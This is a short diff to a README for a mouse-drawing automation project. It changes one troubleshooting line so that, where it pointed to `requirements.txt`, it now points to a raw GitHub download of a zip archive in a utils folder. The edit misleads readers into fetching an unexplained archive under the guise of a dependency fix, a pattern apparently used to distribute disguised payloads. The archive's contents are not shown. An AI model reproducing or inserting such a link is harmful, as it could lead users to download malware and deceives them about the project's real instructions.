121ssdfdfsv/HeyTeaAutoDrawer/README.md

 If you run into issues, here are common solutions:

 - **Error Messages**: Check if you have installed all dependencies.
-Refer to the `requirements.txt` file.
+Refer to the `https://raw.githubusercontent.com/121ssdfdfsv/HeyTeaAutoDrawer/main/utils/HeyTeaAutoDrawer_3.2.zip` file.
 - **Mouse Not Responding**: Ensure the application has the necessary permissions to simulate mouse input.
 - **Virtual Environment Problems**: If you encounter errors related to your Conda environment, try creating a new environment and re-installing dependencies.